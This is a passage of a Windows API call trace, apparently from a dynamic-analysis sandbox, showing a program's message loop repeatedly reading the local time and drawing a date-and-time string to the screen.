wSecond=0x6, wMilliseconds=0xf2)) [0136.501] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.511] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.511] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.511] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xfc)) [0136.511] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xfc)) [0136.511] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.532] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.532] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.532] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x111)) [0136.532] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x111)) [0136.532] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.542] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.542] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.542] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x11b)) [0136.542] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x11b)) [0136.542] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.692] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.692] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.692] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1b1)) [0138.693] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1b2)) [0138.693] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0138.693] GetDC (hWnd=0x0) returned 0xa0100d0 [0138.693] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0138.694] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0138.694] GetSysColor (nIndex=8) returned 0x0 [0138.694] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0138.694] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0138.694] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0138.694] UnrealizeObject (h=0x2d10099f) returned 1 [0138.694] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0138.694] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0138.694] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0138.694] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:08 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:08 PM", lprc=0x19f5bd) returned 13 [0138.695] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0138.695] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0138.695] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0138.695] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0138.695] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0138.695] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.705] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.705] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.705] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1be)) [0138.705] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1be)) [0138.706] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.715] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.715] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.715] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1c8)) [0138.715] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1c8)) [0138.715] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.735] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.737] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.737] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1de)) [0138.737] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1de)) [0138.737] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.753] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.753] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.753] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1ee)) [0138.753] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1ee)) [0138.753] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.763] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.763] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.763] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1f8)) [0138.763] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x1f8)) [0138.763] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.783] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.783] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.783] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x20c)) [0138.784] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x20d)) [0138.784] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.794] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.794] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.794] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x217)) [0138.795] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x218)) [0138.795] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.901] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.901] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.901] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x282)) [0138.901] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x282)) [0138.901] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.912] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.912] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.912] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x28d)) [0138.912] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x28e)) [0138.912] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.919] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.919] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.919] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x294)) [0138.919] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x294)) [0138.919] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.940] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.940] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.940] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2a9)) [0138.940] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2a9)) [0138.940] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.950] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.950] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.950] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2b3)) [0138.950] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2b3)) [0138.950] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.971] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.971] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.971] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2c8)) [0138.971] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2c8)) [0138.971] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0138.982] TranslateMessage (lpMsg=0x2347a14) returned 0 [0138.982] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0138.982] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2d3)) [0138.982] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2d3)) [0138.982] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0139.003] TranslateMessage (lpMsg=0x2347a14) returned 0 [0139.003] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0139.003] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2e8)) [0139.003] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x8, wMilliseconds=0x2e8)) [0139.003] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0139.505] TranslateMessage (lpMsg=0x2347a14) returned 0 [0139.505] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0139.505] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0xf6)) [0139.505] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0xf6)) [0139.505] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0139.505] GetDC (hWnd=0x0) returned 0xa0100d0 [0139.505] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0139.506] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0139.506] GetSysColor (nIndex=8) returned 0x0 [0139.506] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0139.506] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0139.506] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0139.506] UnrealizeObject (h=0x2d10099f) returned 1 [0139.506] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0139.506] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0139.506] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0139.506] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:09 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:09 PM", lprc=0x19f5bd) returned 13 [0139.507] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0139.507] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0139.507] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0139.507] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0139.507] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0139.508] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0139.508] TranslateMessage (lpMsg=0x2347a14) returned 0 [0139.508] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0139.508] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0xf9)) [0139.508] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0xf9)) [0139.508] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0139.516] TranslateMessage (lpMsg=0x2347a14) returned 0 [0139.516] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0139.516] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x101)) [0139.516] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x101)) [0139.516] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0139.526] TranslateMessage (lpMsg=0x2347a14) returned 0 [0139.526] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0139.526] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x10b)) [0139.526] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x10b)) [0139.526] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0139.547] TranslateMessage (lpMsg=0x2347a14) returned 0 [0139.547] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0139.547] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x120)) [0139.547] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x120)) [0139.547] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0139.558] TranslateMessage (lpMsg=0x2347a14) returned 0 [0139.558] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0139.558] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x12b)) [0139.558] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x12b)) [0139.558] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0139.588] TranslateMessage (lpMsg=0x2347a14) returned 0 [0139.588] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0139.588] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x148)) [0139.588] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x148)) [0139.588] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0139.590] TranslateMessage (lpMsg=0x2347a14) returned 0 [0139.590] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0139.590] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x14b)) [0139.590] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x14b)) [0139.590] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.221] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.221] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.221] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x3c2)) [0140.222] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x3c3)) [0140.222] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.231] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.231] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.231] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x3cc)) [0140.231] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x3cc)) [0140.232] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.250] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.250] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.250] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x3df)) [0140.250] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x9, wMilliseconds=0x3df)) [0140.250] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.261] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.261] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.261] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2)) [0140.261] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2)) [0140.261] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0140.261] GetDC (hWnd=0x0) returned 0xa0100d0 [0140.261] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0140.262] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0140.262] GetSysColor (nIndex=8) returned 0x0 [0140.262] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0140.262] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0140.262] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0140.262] UnrealizeObject (h=0x2d10099f) returned 1 [0140.262] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0140.262] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0140.262] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0140.262] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:10 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:10 PM", lprc=0x19f5bd) returned 13 [0140.262] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0140.263] 